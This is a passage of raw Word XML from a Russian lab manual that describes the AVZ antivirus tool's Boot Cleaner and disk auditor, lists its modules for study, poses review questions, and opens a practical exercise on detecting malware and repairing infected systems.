        <w:t>граммами, пересоздающими свои ключи реестра и файлы, или блокирующие доступ к ним. Драйвер системы Boot Cleaner размещен в AV базе и обновляется в ходе автоматического обновления.</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bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Назначение:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:pStyle w:val="western"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="95"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Удаление файлов</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:pStyle w:val="western"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="95"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Удаление ключей реестра</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:pStyle w:val="western"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="95"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Удаление драйверов и служб</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lastRenderedPageBreak/>
        <w:t>Перечисленные операции выполняются в ходе загрузки системы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="western"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Ревизор</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Встроенный в AVZ ревизор диска работает по классической схеме и предполагает выполнение двух операций</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:pStyle w:val="western"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="95"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Изучение имеющихся на диске файлов и построение базы данных, содержащих информацию о этих файлах.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:pStyle w:val="western"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="95"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Сравнение текущего состояния диска с базой данных. Подобное сравнение позволяет обнаружить, какие файлы/папки были созданы, изменены или удалены с момента создания базы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:pStyle w:val="western"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="95"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Сравнение может вестись в стандартном режиме (сравниваются размер файла и его контрольная сумма) и скоростном режиме (сравнивается только размер). Скоростной режим удобен для оперативной проверки диска.</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Основным назначением ревизора является:</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1. Поиск модификаций на диске защищаемого компьютера. Позволяет установить, какие файлы были созданы, изменены или удалены с момент п</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>строения базы. Кроме того, регистрируется создание и удаление каталогов.</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2. Поиск файлов, маскируемых руткитом. Для выполнения данной опер</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ции необходимо.</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2.1 создать базу ревизора, включив в нее системную папку и папки, в к</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>торых предполагается наличие руткитов. Построение базы можно вести в быс</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>т</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ром режиме для экономии времени).</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2.2 выполнить сканирование компьютера с включенным противодейств</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ем руткитам.</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2.3 не выходя из AVZ произвести сравнение текущего состояния с базой, построенной на шаге 2.1.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="western"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3. Сравнение содержимого некоторой папки на двух идентичных комп</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ь</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ютерах.</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pStyle w:val="Mt--1b"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="88"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Изучить документацию по программе (</w:t>
      </w:r>
      <w:hyperlink r:id="rId130" w:history="1">
        <w:r w:rsidRPr="006E1E7E">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>http://z-oleg.com/secur/avz_doc/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="88"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Знать для чего нужны следующие модули программы (название, назначение, функциональные возможности):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="88"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Обшие сведения </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="88"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Работа с программой </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="88"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Карантин </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="88"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Встроенные средства поиска </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="88"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Встроенные утилиты </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="88"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Функции анализа и восстановления </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="88"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Подсистема AVZGuard </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="88"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Подсистема AVZPM </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="88"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Подсистема Boot Cleaner </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="88"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Ревизор </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="88"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Категории вредоносных программ </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="88"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Дополнительная информация </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="88"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Параметры командной строки </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="88"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Часто задаваемые вопросы (FAQ) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="88"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Скрипты управления </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="Mt--1b"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="90"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>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Pr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="90"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>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D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="89"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Какие есть модули в программе AVZ и для чего они нужны?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="89"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1080"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:t>Заражение вирусами Flash BIOS.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:ind w:firstLine="709"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="89"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1080"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:t>Понятие антивируса. Стандартные программы защиты.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="89"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1080"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:t>Процедура поиска вируса.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>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color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="153"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:t>Исследование алгоритма работы вируса.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="153"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:t>Эвристические анализаторы кода вируса.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:ind w:firstLine="709"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="153"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:t>Обзор антивирусных программ.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:left="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:br w:type="page"/>
      </w:r>
      <w:bookmarkStart w:id="134" w:name="_Toc503720808"/>
      <w:bookmarkStart w:id="135" w:name="_Toc3811338"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Практическая работа 18</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:t>. Основные признаки присутствия вредоно</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:t>с</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:t>ных программ и методы по устранению последствий вирусных заражений компьютерной системы</w:t>
      </w:r>
      <w:bookmarkEnd w:id="134"/>
      <w:bookmarkEnd w:id="135"/>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="ad"/>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Цель работы – </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:t>получить навыки обнаружения на компьютере вредоно</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:t>с</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:t>ных программ, изучить основные методы по устранению последствий виру</w:t>
